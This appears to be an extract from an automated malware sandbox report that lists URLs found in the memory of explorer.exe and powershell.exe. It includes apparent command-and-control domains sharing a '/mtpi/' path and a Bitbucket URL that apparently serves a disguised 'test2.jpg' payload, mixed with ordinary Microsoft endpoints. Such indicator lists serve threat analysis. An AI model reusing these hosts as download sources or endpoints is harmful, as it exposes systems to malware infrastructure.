Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.etimestrips.store/mtpi/
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.etimestrips.store/mtpi/www.exclusivepiscinas.net
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.etimestrips.storeReferer:
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.exclusivepiscinas.net
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.exclusivepiscinas.net/mtpi/
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.exclusivepiscinas.net/mtpi/www.ocgccv.info
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.exclusivepiscinas.netReferer:
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.hopeclothing.shop
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.hopeclothing.shop/mtpi/
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.hopeclothing.shop/mtpi/www.truow.life
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.hopeclothing.shopReferer:
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.jpsjlpszv1emibow.cyou
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.jpsjlpszv1emibow.cyou/mtpi/
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.jpsjlpszv1emibow.cyou/mtpi/www.ecommerce-25754.bond
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.jpsjlpszv1emibow.cyouReferer:
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lekido.tech
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lekido.tech/mtpi/
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lekido.tech/mtpi/www.afrowears.store
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lekido.techReferer:
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.menopausemarketing.pro
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.menopausemarketing.pro/mtpi/
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.menopausemarketing.pro/mtpi/www.etimestrips.store
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.menopausemarketing.proReferer:
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nw01erf.pro
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nw01erf.pro/mtpi/
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nw01erf.pro/mtpi/www.hopeclothing.shop
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nw01erf.proReferer:
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ocgccv.info
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ocgccv.info/mtpi/
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ocgccv.info/mtpi/www.cameronreitsma.net
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ocgccv.infoReferer:
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.tokenpool.xyz
Source: explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.tokenpool.xyz/mtpi/
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.tokenpool.xyzReferer:
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.truow.life
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.truow.life/mtpi/
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.truow.life/mtpi/www.menopausemarketing.pro
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.truow.lifeReferer:
Source: explorer.exe, 00000007.00000002.2667669675.000000000CD7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1535163726.000000000CD7E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000007.00000003.2072408044.0000000007BAE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072617750.0000000007BFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1519605877.0000000007BA3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2660117349.0000000007C02000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000007.00000003.2072408044.0000000007BAE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072617750.0000000007BFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1519605877.0000000007BA3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2660117349.0000000007C02000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/odirm
Source: powershell.exe, 00000001.00000002.1815974500.000001A600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1815974500.000001A600062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1517714752.000002B59E091000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: explorer.exe, 00000007.00000002.2662764839.0000000009B49000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000007.00000000.1523845606.0000000009B49000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071685840.0000000009B66000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2662764839.0000000009B49000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOSd
Source: explorer.exe, 00000007.00000002.2658707759.0000000007B56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007B56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1519605877.0000000007B56000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000007.00000000.1523845606.00000000099E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2662764839.00000000099E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072846978.00000000099E5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: powershell.exe, 00000003.00000002.1517714752.000002B59E2B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?13711309
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000007.00000000.1536456695.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2668928714.000000000CF36000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: powershell.exe, 00000003.00000002.1517714752.000002B59E2B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000007.00000000.1519605877.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072664500.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2658707759.0000000007AEB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
